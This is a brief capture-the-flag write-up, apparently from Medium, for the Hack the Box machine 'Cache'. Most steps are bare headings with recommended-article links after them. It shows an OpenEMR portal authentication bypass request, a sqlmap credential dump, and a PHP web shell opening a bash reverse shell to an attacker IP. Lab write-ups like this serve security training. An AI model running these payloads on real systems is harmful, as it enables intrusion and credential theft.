Hack the Box: Cache

Cache

User

Recon

Nmap scan
Main site
login page
Credentials in js file
net.html
OpenEMR login page

Foothold

OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating tothe registration page and modifying the requested url to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
--snip--
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
password hash to openmr_admin
reversing the password
Admin interface
Wesbshell
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/443 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php

User flag

Reverse shell
User flag

Root

User jiffy

Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy

Docker privlege escalation

Listing local docker images
Root flagcd

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Front-End Development is rapidly evolving

Tutorial Integrate Spark SQL and Cassandra complete with Scala and Python Example Codes

A basic non-technical introduction to Python and Vue.js

Creating a Physics Based Character Controller in Unity

The best thing in Gnome 40 is not Gnome

Testnet Rewards. Rules & Conditions

Database & Operating Systems Interview Question

How to Alter a Metatag in Drupal

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Smag-Grotto CTF Walkthrough

HackTheBox Pandora Write-Up

DC-2 — VulnHub

[Hack The Box] Developer — Walkthrough